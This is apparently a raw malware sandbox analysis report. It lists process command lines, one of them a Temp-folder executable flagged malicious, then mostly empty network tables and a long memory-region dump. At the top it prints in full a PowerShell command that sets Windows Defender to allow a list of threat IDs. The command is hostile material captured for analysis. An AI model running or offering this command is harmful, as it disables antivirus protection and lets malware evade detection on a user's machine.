powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
malicious
C:\Users\user\AppData\Local\Temp\u2xs.2\run.exe
"C:\Users\user\AppData\Local\Temp\u2xs.2\run.exe"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http:///
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 3808 -ip 3808
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2320 --field-trial-handle=2200,i,17811840805501722127,12993279827100568495,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3808 -s 1936
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\wbem\WmiPrvSE.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
57 further processes are hidden in the source report and not listed here.

URLs

Name
IP
Malicious

Domains

Name
IP
Malicious

IPs

IP
Domain
Country
Malicious

Registry

Path
Value
Malicious

Memdumps

Base Address
Regiontype
Protect
Malicious
2924000
heap
page read and write
5713000
heap
page read and write
2924000
heap
page read and write
15F0000
trusted library allocation
page read and write
4045000
unkown
page readonly
E50000
heap
page read and write
2924000
heap
page read and write
32F7000
heap
page read and write
2B6E000
stack
page read and write
2770000
heap
page read and write
24840000
heap
page read and write
5D78000
heap
page read and write
32C0000
heap
page read and write
68C10000
unkown
page readonly
2485C000
heap
page read and write
791000
unkown
page execute read
700000
heap
page read and write
2C38000
heap
page read and write
2924000
heap
page read and write
59FE000
stack
page read and write
E8B000
heap
page read and write
540000
heap
page read and write
2924000
heap
page read and write
2E00000
heap
page read and write
2C6D000
heap
page read and write
2924000
heap
page read and write
378A000
trusted library allocation
page read and write
444F000
stack
page read and write
5C48000
heap
page read and write
24855000
heap
page read and write
5E02000
heap
page read and write
2E91000
heap
page read and write
F0A000
heap
page read and write
835D000
stack
page read and write
1340000
trusted library allocation
page read and write
424C000
trusted library allocation
page read and write
3250000
heap
page read and write
4014000
heap
page read and write
6EFD000
stack
page read and write
262BBC00000
heap
page read and write
3441000
trusted library allocation
page read and write
32DF000
stack
page read and write
441000
unkown
page read and write
7789000
stack
page read and write
2E91000
heap
page read and write
450000
heap
page read and write
DC0000
heap
page read and write
4B3F000
stack
page read and write
32A0000
heap
page execute and read and write
262BBBD0000
heap
page read and write
380F000
stack
page read and write
2F91000
heap
page read and write
32CE000
stack
page read and write
70AB000
heap
page read and write
34C7000
trusted library allocation
page read and write
4040000
heap
page read and write
2924000
heap
page read and write
35A7000
trusted library allocation
page read and write
1F85000
heap
page read and write
5E50000
heap
page read and write
6200000
trusted library allocation
page read and write
228F000
stack
page read and write
530000
heap
page read and write
2A8CE000
heap
page read and write
80B000
heap
page read and write
2C30000
heap
page read and write
27B8000
direct allocation
page read and write
5E03000
heap
page read and write
262BCC60000
trusted library section
page readonly
262C12F0000
heap
page read and write
EB4000
heap
page read and write
EA9000
heap
page read and write
3030000
trusted library allocation
page read and write
2EBD000
stack
page read and write
83C000
stack
page read and write
5FF000
heap
page read and write
30BF000
stack
page read and write
4382000
trusted library allocation
page read and write
5E07000
heap
page read and write
61E01000
direct allocation
page execute read
33EE000
stack
page read and write
3041000
trusted library allocation
page read and write
F18000
heap
page read and write
2BA4000
unkown
page read and write
7657BFE000
stack
page read and write
3638000
trusted library allocation
page read and write
626000
heap
page read and write
3210000
heap
page read and write
78A0000
trusted library allocation
page read and write
352E000
trusted library allocation
page read and write
2E91000
heap
page read and write
7FE000
stack
page read and write
CEF000
stack
page read and write
68E8E000
unkown
page read and write
7500000
trusted library allocation
page read and write
3270000
heap
page read and write
68E8F000
unkown
page write copy
12E4000
heap
page read and write
31D6000
trusted library allocation
page read and write
2485B000
heap
page read and write
72E000
unkown
page read and write
AA0000
heap
page read and write
2C52000
heap
page read and write
32F3000
heap
page read and write
E01000
unkown
page readonly
5E02000
heap
page read and write
2920000
heap
page read and write
5B3A000
stack
page read and write
3742000
trusted library allocation
page read and write
5E02000
heap
page read and write
2E91000
heap
page read and write
2BA4000
unkown
page read and write
730000
unkown
page read and write
7656E7E000
unkown
page readonly
B1E000
stack
page read and write
701C000
heap
page read and write
31CF000
stack
page read and write
2CAE000
heap
page read and write
2924000
heap
page read and write
790000
unkown
page readonly
2E91000
heap
page read and write
2C83000
heap
page read and write
1390000
trusted library allocation
page execute and read and write
3020000
unkown
page read and write
2484F000
heap
page read and write
4277000
trusted library allocation
page read and write
6E0000
heap
page read and write
31D0000
heap
page read and write
3090000
heap
page read and write
490000
heap
page read and write
2483E000
heap
page read and write
586E000
stack
page read and write
83F000
stack
page read and write
2816000
direct allocation
page read and write
2924000
heap
page read and write
353E000
trusted library allocation
page read and write
F1A000
heap
page read and write
13DB000
heap
page read and write
2E91000
heap
page read and write
148A000
heap
page read and write
5DC2000
heap
page read and write
654000
heap
page read and write
5D78000
heap
page read and write
439F000
stack
page read and write
3CCD000
heap
page read and write
5660000
trusted library allocation
page execute and read and write
262BC940000
trusted library allocation
page read and write
5E03000
heap
page read and write
CC0000
heap
page read and write
700C000
heap
page read and write
1730000
heap
page execute and read and write
43E7000
trusted library allocation
page read and write
3242000
trusted library allocation
page read and write
2484E000
heap
page read and write
2E91000
heap
page read and write
262C10B1000
trusted library allocation
page read and write
E0C000
unkown
page readonly
262C1180000
trusted library allocation
page read and write
6610000
trusted library allocation
page read and write
41D0000
heap
page read and write
3290000
heap
page execute and read and write
617000
heap
page read and write
2F8F000
stack
page read and write
299E000
stack
page read and write
2EB0000
heap
page read and write
10F9000
stack
page read and write
2924000
heap
page read and write
5E02000
heap
page read and write
2EBD000
stack
page read and write
690000
heap
page read and write
7491000
heap
page read and write
2C80000
unkown
page read and write
839E000
stack
page read and write
68CC000
stack
page read and write
5EB9000
heap
page read and write
42AC000
trusted library allocation
page read and write
42D4000
heap
page read and write
417000
unkown
page execute read
E8B000
heap
page read and write
4301000
heap
page read and write
1680000
trusted library allocation
page read and write
438D000
trusted library allocation
page read and write
82E0000
trusted library allocation
page execute and read and write
2E91000
heap
page read and write
1334000
trusted library allocation
page read and write
765717C000
stack
page read and write
6170000
trusted library allocation
page read and write
30B8000
heap
page read and write
DFD000
stack
page read and write
33C7000
trusted library allocation
page read and write
275D000
direct allocation
page read and write
3590000
heap
page read and write
327E000
stack
page read and write
2E91000
heap
page read and write
10163000
direct allocation
page read and write
262BC59C000
heap
page read and write
24836000
heap
page read and write
262C1123000
trusted library allocation
page read and write
6A15000
heap
page read and write
3440000
heap
page read and write
D35000
heap
page read and write
4431000
trusted library allocation
page read and write
D0E000
heap
page read and write
2485C000
heap
page read and write
4308000
trusted library allocation
page read and write
31D0000
heap
page read and write
2C40000
heap
page read and write
6A2000
heap
page read and write
12E4000
heap
page read and write
EBE000
heap
page read and write
2E91000
heap
page read and write
34F0000
trusted library allocation
page read and write
690000
heap
page read and write
5FF1000
trusted library allocation
page read and write
840000
heap
page read and write
6C0000
heap
page read and write
53CD000
stack
page read and write
2774000
direct allocation
page read and write
400000
unkown
page readonly
5471000
unkown
page read and write
2924000
heap
page read and write
2BA4000
unkown
page read and write
10001000
direct allocation
page execute read
218E000
stack
page read and write
4252000
trusted library allocation
page read and write
2924000
heap
page read and write
3258000
trusted library allocation
page read and write
2E91000
heap
page read and write
53AB000
trusted library allocation
page read and write
1900000
heap
page read and write
373FC000
stack
page read and write
33B8000
trusted library allocation
page read and write
4060000
heap
page read and write
33EB000
trusted library allocation
page read and write
6760000
trusted library allocation
page execute and read and write
2F90000
trusted library allocation
page read and write
36A3000
trusted library allocation
page read and write
5D6E000
stack
page read and write
41CB000
trusted library allocation
page read and write
2E91000
heap
page read and write
84D0000
heap
page read and write
5DAE000
stack
page read and write
3438000
trusted library allocation
page read and write
2755000
direct allocation
page read and write
193000
stack
page read and write
97000
stack
page read and write
27A7000
stack
page read and write
5E02000
heap
page read and write
2E91000
heap
page read and write
2E91000
heap
page read and write
612E000
stack
page read and write
2484E000
heap
page read and write
4DAE000
stack
page read and write
E8B000
heap
page read and write
2924000
heap
page read and write
2F82000
heap
page read and write
7512000
heap
page read and write
2DCE000
stack
page read and write
5D57000
heap
page read and write
ECC000
heap
page read and write
2F7F000
unkown
page read and write
68C11000
unkown
page execute read
5C5B000
stack
page read and write
76578FE000
stack
page read and write
778000
unkown
page read and write
3553000
trusted library allocation
page read and write
31C4000
heap
page read and write
262C12E6000
heap
page read and write
5C90000
direct allocation
page execute and read and write
5FE000
stack
page read and write
D2F000
heap
page read and write
4293000
trusted library allocation
page read and write
EB4000
heap
page read and write
60EF000
stack
page read and write
2AFD000
stack
page read and write
3214000
trusted library allocation
page read and write
76566FF000
stack
page read and write
262BBCA1000
heap
page read and write
2733000
direct allocation
page read and write
5DCD000
heap
page read and write
341E000
stack
page read and write
42F4000
heap
page read and write
431C000
trusted library allocation
page read and write
262C1030000
trusted library allocation
page read and write
4314000
trusted library allocation
page read and write
42EF000
heap
page read and write
5E02000
heap
page read and write
7820000
trusted library allocation
page read and write
2F75000
heap
page read and write
2924000
heap
page read and write
3297000
heap
page read and write
248CF000
heap
page read and write
35D8000
heap
page read and write
63D000
stack
page read and write
2980000
heap
page read and write
5D5F000
heap
page read and write
33F8000
trusted library allocation
page read and write
6FD000
heap
page read and write
5090000
heap
page read and write
2924000
heap
page read and write
809000
unkown
page write copy
43AE000
trusted library allocation
page read and write
2C69000
heap
page read and write
2BA4000
unkown
page read and write
BDC000
stack
page read and write
5ABA000
stack
page read and write
2707000
heap
page read and write
5D7A000
heap
page read and write
168B000
heap
page read and write
2BA0000
heap
page read and write
2EBF000
stack
page read and write
3270000
heap
page read and write
3732000
trusted library allocation
page read and write
12F0000
heap
page read and write
3015000
trusted library allocation
page execute and read and write
20A0000
trusted library allocation
page read and write
DF4000
unkown
page read and write
760000
heap
page read and write
2924000
heap
page read and write
3420000
heap
page execute and read and write
24833000
heap
page read and write
4206000
trusted library allocation
page read and write
2924000
heap
page read and write
37B02000
heap
page read and write
262C10A0000
trusted library allocation
page read and write
56E0000
heap
page execute and read and write
318B000
trusted library allocation
page read and write
2A80000
heap
page read and write
FD0000
heap
page read and write
14A4000
heap
page read and write
557E000
trusted library allocation
page read and write
41BA000
trusted library allocation
page read and write
342B000
heap
page read and write
6EB000
heap
page read and write
3319000
trusted library allocation
page read and write
12E4000
heap
page read and write
33BD000
trusted library allocation
page read and write
616D000
stack
page read and write
83C0000
trusted library allocation
page execute and read and write
3431000
trusted library allocation
page read and write
431000
unkown
page read and write
3221000
trusted library allocation
page read and write
2BA4000
unkown
page read and write
628000
heap
page read and write
5710000
heap
page read and write
14A4000
heap
page read and write
5E06000
heap
page read and write
2AF5000
heap
page read and write
175B000
trusted library allocation
page read and write
374F0000
heap
page read and write
1740000
trusted library allocation
page read and write
61ED3000
direct allocation
page read and write
24825000
heap
page read and write
24854000
heap
page read and write
49B000
heap
page read and write
2ACD000
heap
page read and write
437D000
trusted library allocation
page read and write
686D9000
unkown
page write copy
61C0000
trusted library allocation
page read and write
16EB000
trusted library allocation
page read and write
133D000
trusted library allocation
page execute and read and write
53B9000
trusted library allocation
page read and write
3445000
trusted library allocation
page read and write
B5F000
stack
page read and write
699000
heap
page read and write
3399000
trusted library allocation
page read and write
E83000
unkown
page readonly
262C10F0000
trusted library allocation
page read and write
30E0000
heap
page read and write
3A40000
heap
page read and write
5DAF000
heap
page read and write
353C000
trusted library allocation
page read and write
3560000
heap
page read and write
1E10E000
stack
page read and write
5DCD000
heap
page read and write
40C000
unkown
page read and write
9CE000
stack
page read and write
540000
heap
page read and write
2E91000
heap
page read and write
EB5000
heap
page read and write
7F90000
trusted library allocation
page read and write
262C11F0000
trusted library allocation
page read and write
5DCF000
heap
page read and write
500000
heap
page read and write
503F000
stack
page read and write
3270000
heap
page readonly
8E0000
heap
page read and write
C78000
heap
page read and write
2ED0000
remote allocation
page read and write
5A7D000
stack
page read and write
262C1325000
heap
page read and write
BEF000
stack
page read and write
5DAF000
heap
page read and write
648F000
trusted library allocation
page read and write
7E3F000
stack
page read and write
42E7000
trusted library allocation
page read and write
4FFE000
stack
page read and write
2924000
heap
page read and write
1619000
trusted library allocation
page read and write
785000
heap
page read and write
13E5000
heap
page read and write
E80000
heap
page read and write
656000
heap
page read and write
E81000
heap
page read and write
262C11B0000
trusted library allocation
page read and write
1365000
trusted library allocation
page execute and read and write
F31000
heap
page read and write
613000
heap
page read and write
5E02000
heap
page read and write
2484E000
heap
page read and write
3644000
trusted library allocation
page read and write
2924000
heap
page read and write
790000
unkown
page readonly
5DCB000
heap
page read and write
2E20000
heap
page read and write
31CC000
trusted library allocation
page read and write
1620000
heap
page read and write
2E91000
heap
page read and write
2E91000
heap
page read and write
343A000
trusted library allocation
page read and write
5DAF000
heap
page read and write
3449000
trusted library allocation
page read and write
7840000
trusted library allocation
page read and write
2483B000
heap
page read and write
DFE000
unkown
page readonly
248BF000
heap
page read and write
2FA0000
heap
page read and write
3490000
heap
page read and write
DFE000
stack
page read and write
262BCB80000
trusted library allocation
page read and write
6270000
trusted library allocation
page read and write
78CC000
stack
page read and write
5471000
unkown
page read and write
262C134F000
heap
page read and write
68E95000
unkown
page readonly
1F81000
heap
page read and write
2BA4000
unkown
page read and write
24840000
heap
page read and write
7ABE000
stack
page read and write
2F0E000
stack
page read and write
2F78000
heap
page read and write
4263000
trusted library allocation
page read and write
2C83000
heap
page read and write
EB3000
heap
page read and write
37623000
heap
page read and write
57AE000
stack
page read and write
CC7000
heap
page read and write
15EE000
stack
page read and write
3359000
trusted library allocation
page read and write
9B000
stack
page read and write
2E91000
heap
page read and write
2E91000
heap
page read and write
24850000
heap
page read and write
4045000
unkown
page readonly
37B53000
heap
page read and write
754E000
heap
page read and write
27F9000
direct allocation
page read and write
695000
stack
page read and write
323E000
stack
page read and write
2D9E000
stack
page read and write
3426000
trusted library allocation
page read and write
5D40000
heap
page read and write
420000
unkown
page write copy
A60000
heap
page read and write
78D0000
trusted library allocation
page read and write
2BA4000
unkown
page read and write
F42000
heap
page read and write
72AC000
stack
page read and write
765797E000
unkown
page readonly
576E000
stack
page read and write
4242000
trusted library allocation
page read and write
75E000
unkown
page read and write
1F0000
heap
page read and write
4232000
trusted library allocation
page read and write
670000
heap
page read and write
DFF000
unkown
page execute and write copy
790D000
stack
page read and write
2BA4000
unkown
page read and write
5E02000
heap
page read and write
CFF000
heap
page read and write
C1C000
stack
page read and write
5ECA000
heap
page read and write
EDB000
heap
page read and write
2924000
heap
page read and write
2C8D000
stack
page read and write
5EC5000
heap
page read and write
2924000
heap
page read and write
3310000
heap
page read and write
5D5D000
heap
page read and write
2F8F000
heap
page read and write
30AE000
stack
page read and write
5D5D000
heap
page read and write
28DA000
stack
page read and write
262C12E8000
heap
page read and write
262C1302000
heap
page read and write
105D7000
direct allocation
page read and write
4499000
trusted library allocation
page read and write
77CD000
stack
page read and write
170D000
trusted library allocation
page read and write
41C3000
trusted library allocation
page read and write
2924000
heap
page read and write
14A4000
heap
page read and write
1C7B000
heap
page read and write
7100000
trusted library section
page read and write
2FE3000
trusted library allocation
page execute and read and write
75A6000
heap
page read and write
262BCC80000
trusted library section
page readonly
2F7E000
heap
page read and write
3010000
trusted library allocation
page read and write
2924000
heap
page read and write
262BBC7D000
heap
page read and write
ED6000
heap
page read and write
EC7000
heap
page read and write
262C1338000
heap
page read and write
774E000
stack
page read and write
2BA4000
unkown
page read and write
910000
heap
page read and write
5ED4000
heap
page read and write
3240000
trusted library allocation
page read and write
D25000
heap
page read and write
740000
heap
page read and write
68580000
unkown
page readonly
ED8000
heap
page read and write
758E000
heap
page read and write
E83000
unkown
page readonly
43AA000
trusted library allocation
page read and write
2924000
heap
page read and write
3080000
heap
page readonly
34F0000
trusted library allocation
page read and write
5DB5000
heap
page read and write
35B0000
trusted library allocation
page read and write
262C10F0000
trusted library allocation
page read and write
8D0000
heap
page read and write
2924000
heap
page read and write
2924000
heap
page read and write
2F7A000
heap
page read and write
2F7E000
heap
page read and write
65FC000
stack
page read and write
DFB000
unkown
page read and write
2924000
heap
page read and write
262BC415000
heap
page read and write
49D4000
unkown
page read and write
E7C000
unkown
page read and write
53BD000
trusted library allocation
page read and write
5D70000
heap
page read and write
324D000
trusted library allocation
page read and write
1320000
heap
page read and write
445000
unkown
page readonly
262BBC41000
heap
page read and write
664C000
stack
page read and write
4366000
trusted library allocation
page read and write
2E94000
heap
page read and write
5472000
unkown
page read and write
E8D000
heap
page read and write
DF4000
unkown
page read and write
2924000
heap
page read and write
5E02000
heap
page read and write
5DCF000
heap
page read and write
24925000
heap
page read and write
2F82000
heap
page read and write
3415000
heap
page execute and read and write
2784000
direct allocation
page read and write
2FFE000
stack
page read and write
EC7000
heap
page read and write
2C1E000
stack
page read and write
2924000
heap
page read and write
EEE000
heap
page read and write
DFE000
unkown
page readonly
4540000
heap
page read and write
2E91000
heap
page read and write
13B0000
heap
page read and write
67D000
stack
page read and write
83A0000
heap
page read and write
2F82000
heap
page read and write
2A911000
heap
page read and write
3549000
trusted library allocation
page read and write
2B15000
unkown
page read and write
27C6000
direct allocation
page read and write
765747E000
unkown
page readonly
2A8B7000
heap
page read and write
2700000
heap
page read and write
262BC402000
heap
page read and write
342C000
trusted library allocation
page read and write
330E000
stack
page read and write
1367000
trusted library allocation
page execute and read and write
5DAF000
heap
page read and write
DFB000
unkown
page read and write
262C1450000
remote allocation
page read and write
2E91000
heap
page read and write
2BA4000
unkown
page read and write
69D000
heap
page read and write
6B1000
heap
page read and write
41B3000
trusted library allocation
page read and write
1670000
trusted library allocation
page read and write
6260000
trusted library allocation
page read and write
2BA4000
unkown
page read and write
5E50000
heap
page read and write
2924000
heap
page read and write
6E60000
heap
page read and write
2E91000
heap
page read and write
2BA4000
unkown
page read and write
69CC000
stack
page read and write
C60000
unkown
page readonly
1746000
trusted library allocation
page read and write
2E91000
heap
page read and write
24846000
heap
page read and write
53F2000
trusted library allocation
page read and write
3435000
trusted library allocation
page read and write
2BBE000
stack
page read and write
840000
heap
page read and write
2CAC000
heap
page read and write
102B000
stack
page read and write
790000
unkown
page readonly
1903000
heap
page read and write
286B000
heap
page read and write
1600000
trusted library allocation
page read and write
2485C000
heap
page read and write
262C1090000
trusted library allocation
page read and write
13B8000
heap
page read and write
332A000
trusted library allocation
page read and write
ECB000
heap
page read and write
2924000
heap
page read and write
32EE000
stack
page read and write
5DB2000
heap
page read and write
1F80000
heap
page read and write
27D5000
direct allocation
page read and write
171E000
heap
page read and write
520000
heap
page read and write
809000
unkown
page write copy
5E02000
heap
page read and write
2924000
heap
page read and write
DFE000
unkown
page readonly
5DBC000
heap
page read and write
24854000
heap
page read and write
7FA0000
trusted library allocation
page execute and read and write
262BC51B000
heap
page read and write
61EB4000
direct allocation
page read and write
24846000
heap
page read and write
400000
unkown
page readonly
192F000
stack
page read and write
5DBD000
heap
page read and write
42D2000
trusted library allocation
page read and write
40A000
unkown
page read and write
2924000
heap
page read and write
3100000
trusted library allocation
page read and write
1356000
trusted library allocation
page execute and read and write
E4E000
stack
page read and write
2924000
heap
page read and write
34DE000
stack
page read and write
4351000
trusted library allocation
page read and write
51E9000
direct allocation
page read and write
5470000
unkown
page read and write
2924000
heap
page read and write
4321000
trusted library allocation
page read and write
56B0000
trusted library allocation
page read and write
5C30000
heap
page read and write
44DF000
stack
page read and write
5DBE000
heap
page read and write
42D7000
trusted library allocation
page read and write
3F10000
heap
page read and write
2BA4000
unkown
page read and write
608000
heap
page read and write
5DB9000
heap
page read and write
262BBC91000
heap
page read and write
4AFE000
stack
page read and write
70EE000
stack
page read and write
2CB2000
heap
page read and write
5E61000
heap
page read and write
13B0000
heap
page read and write
15BF000
stack
page read and write
217F000
heap
page read and write
426E000
trusted library allocation
page read and write
24854000
heap
page read and write
6330000
heap
page read and write
C80000
heap
page read and write
38C6000
trusted library allocation
page read and write
2E91000
heap
page read and write
2924000
heap
page read and write
5DCA000
heap
page read and write
2484E000
heap
page read and write
2E91000
heap
page read and write
C60000
unkown
page readonly
5DB4000
heap
page read and write
262BBD02000
heap
page read and write
429F000
trusted library allocation
page read and write
35F6000
trusted library allocation
page read and write
2485B000
heap
page read and write
37B94000
heap
page read and write
3285000
trusted library allocation
page read and write
4371000
trusted library allocation
page read and write
EDB000
heap
page read and write
2E91000
heap
page read and write
809000
unkown
page read and write
3200000
heap
page read and write
42FE000
trusted library allocation
page read and write
6660000
trusted library allocation
page execute and read and write
5CB000
heap
page read and write
2E91000
heap
page read and write
274E000
direct allocation
page read and write
7A30000
heap
page read and write
2CAE000
heap
page read and write
68C9E000
unkown
page read and write
7A70000
trusted library allocation
page execute and read and write
9B000
stack
page read and write
5D0000
heap
page read and write
12E4000
heap
page read and write
1320000
trusted library allocation
page read and write
5E04000
heap
page read and write
4225000
trusted library allocation
page read and write
2E91000
heap
page read and write
36B0000
heap
page read and write
43B7000
trusted library allocation
page read and write
13AB000
trusted library allocation
page read and write
266E000
stack
page read and write
5DC2000
heap
page read and write
5E04000
heap
page read and write
2C85000
heap
page read and write
5CEF000
stack
page read and write
56CB000
trusted library allocation
page read and write
5CB000
heap
page read and write
C61000
unkown
page execute read
5DC7000
heap
page read and write
6E0000
heap
page read and write
262C2000000
heap
page read and write
54D000
stack
page read and write
77B000
unkown
page write copy
347F000
stack
page read and write
CD1000
heap
heap
page read and write
5E02000
heap
page read and write
326C000
stack
page read and write
2EAF000
stack
page read and write
307E000
stack
page read and write
2F75000
heap
page read and write
CB0000
heap
page read and write
8B0000
heap
page read and write
2483C000
heap
page read and write
76579FE000
stack
page read and write
214C000
stack
page read and write
E84000
heap
page read and write
5EE0000
heap
page read and write
14A4000
heap
page read and write
2924000
heap
page read and write
262C12FD000
heap
page read and write
2FAC000
stack
page read and write
2C2E000
stack
page read and write
1DE7E000
stack
page read and write
7850000
trusted library allocation
page read and write
41D1000
trusted library allocation
page read and write
2EBE000
stack
page read and write
D39000
heap
page read and write
5DBB000
heap
page read and write
5D6A000
heap
page read and write
2C8A000
heap
page read and write
262BBC7A000
heap
page read and write
1DF7F000
stack
page read and write
314F000
stack
page read and write
3306000
trusted library allocation
page read and write
3247000
trusted library allocation
page execute and read and write
61ECC000
direct allocation
page read and write
61ED0000
direct allocation
page read and write
84C0000
trusted library allocation
page read and write
1E35E000
stack
page read and write
2E91000
heap
page read and write
2F77000
heap
page read and write
31DE000
stack
page read and write
302E000
stack
page read and write
5E60000
heap
page read and write
3448000
heap
page read and write
3654000
trusted library allocation
page read and write
3506000
trusted library allocation
page read and write
262BC513000
heap
page read and write
325D000
stack
page read and write
37600000
heap
page read and write
2F90000
heap
page read and write
1610000
heap
page read and write
2BA4000
unkown
page read and write
3440000
heap
page read and write
262C1256000
heap
page read and write
5D20000
heap
page read and write
2CBB000
heap
page read and write
5E10000
heap
page read and write
E8D000
heap
page read and write
EC4000
heap
page read and write
87E000
unkown
page readonly
363F000
trusted library allocation
page read and write
970000
heap
page read and write
5DD2000
heap
page read and write
2924000
heap
page read and write
EC5000
heap
page read and write
2F8D000
heap
page read and write
87C000
stack
page read and write
5DC000
stack
page read and write
96F000
stack
page read and write
1050000
heap
page read and write
2E91000
heap
page read and write
24850000
heap
page read and write
75C1000
heap
page read and write
2B20000
heap
page read and write
5E6B000
heap
page read and write
24840000
heap
page read and write
2924000
heap
page read and write
27A2000
direct allocation
page read and write
2FE4000
trusted library allocation
page read and write
765817A000
stack
page read and write
69E000
stack
page read and write
4020000
unkown
page read and write
3490000
heap
page read and write
4459000
trusted library allocation
page read and write
313C000
trusted library allocation
page read and write
1658000
heap
page read and write
2924000
heap
page read and write
3070000
heap
page read and write
3447000
heap
page read and write
2808000
direct allocation
page read and write
840000
heap
page read and write
262C1210000
trusted library allocation
page read and write
3317000
heap
page read and write
2E8F000
stack
page read and write
33AE000
stack
page read and write
5E02000
